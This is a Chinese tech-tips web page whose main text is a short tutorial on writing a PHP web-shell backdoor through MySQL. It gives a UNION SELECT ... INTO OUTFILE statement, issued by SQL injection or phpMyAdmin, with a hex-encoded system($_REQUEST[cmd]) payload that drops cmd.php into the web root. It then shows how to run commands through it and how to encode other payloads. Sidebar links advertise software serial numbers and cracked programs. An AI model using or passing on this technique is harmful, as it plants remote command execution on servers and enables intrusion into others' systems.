- 1PS提示:因为图层已锁定,无法编辑图层的处理方法
- 2picacg苹果版怎么找不到|picacg ios版是不是下架了介绍
- 3Adobe Illustrator CS5 序列号大全
- 4ACDsee注册码免费分享(含ACDsee18、ACDsee10等版本)
- 5Potato(土豆聊天)怎么换头像|Potato app更改头像方法介绍
- 6PDF浏览器能看3D文件吗?PDF浏览器看3D文件图文详细教程
- 7Potato(马铃薯聊天)怎么注册不了|Potato不能注册处理方法介绍
- 8最新的Adobe Illustrator CS4序列号大全
- 9Intel i7-9700K性能跑分曝光:同代提升约12%
- 10Intel Z390主板有望10月8日公布:8核9代酷睿随后登场
- 11XP系统怎么清除缓存?
- 12ACDSee与2345看图王哪一个好用?区别比较
[摘要]通过MySQL(和PHP搭配之最佳组合) 的语句生成后门木马的方法:SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F70687...
通过MySQL(和PHP搭配之最佳组合) 的语句生成后门木马的方法:
SELECT * FROM `vbb_strikes` WHERE 1 union select
2,3,0x3C3F7068702073797374656D28245F52455155455
3545B636D645D293B3F3E
from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'
通过MySQL(和PHP搭配之最佳组合) 的注入或者在 phpmyadmin 里运行以上语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文件,内容为原来的 vbb_strikes 内容,后面紧跟着:
2 3 <?php system($_REQUEST[cmd]);?>
再通过 http://www.xxx.com/cmd.php?cmd=dir c: 就可以执行系统dos命令!
问:那串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么?
答:就是下图代码中的十六进制编码,
<?php system($_REQUEST[cmd]);?>
如果不用这种方法,有不同的SQL版本会出现其它的编码:如%xx之类的,哪这个后门就不能执行了!如果你有其它语名要弄,可以到UltraEdit里输入,再按[Ctrl+H]键,将里面的十六进制连在一起就可以了!
上面是电脑上网安全的一些基础常识,学习了安全知识,几乎可以让你免费电脑中毒的烦扰。
推荐资讯 总人气榜
最新教程 本月人气
- 1新版emoji表情含义大全
- 2用app怎么转化emoji表情组成的图片?
- 3怎么制作emoji表情?emoji表情制作图文详细教程
- 4emoji表情加2根辫子的制作图文详细教程
- 5拼立得PC版怎么用?拼立得PC版使用图文详细教程
- 6painter图文详细教程:painter手绘漫画图文详细教程
- 7ps怎么添加emoji表情?ps添加emoji表情图文详细教程
- 8autocad2008破解版怎么用?cad2008破解安装图文详细教程
- 9faceu拍视频分享了只有声音没有画面怎么回事?
- 10得图相机怎么使用?得图相机使用方法
- 11AutoCAD2008序列号及及注册码是多少
- 12美图秀秀与美颜相机哪一个好?美图秀秀与美颜相机比较
- 1红米3什么时候上市 红米3上市时间
- 2晃脸怎么删除作品|晃脸删除视频方法介绍
- 3QQ群红包怎么指定成员领取
- 4手机QQ朋友力MAX勋章怎么点亮 QQ勋章朋友力max怎么点亮
- 5腾讯大王卡真实的使用感受
- 6QQ金豆有什么用?
- 7XP系统怎么安装无线网卡驱动?
- 8芒果tv会员账号共享2017.5.27芒果tv最新共享vip会员账号更新
- 9vivo x5pro与魅族mx4哪一个好 魅族mx4与vivo x5pro比较
- 10vivo x5pro与魅族mx4pro哪一个好 魅族mx4pro与vivo x5pro比较
- 11vivo x5pro与魅蓝metal哪一个好 魅蓝metal与vivo x5pro比较
- 12红米note3什么时候公布 红米note3公布时间
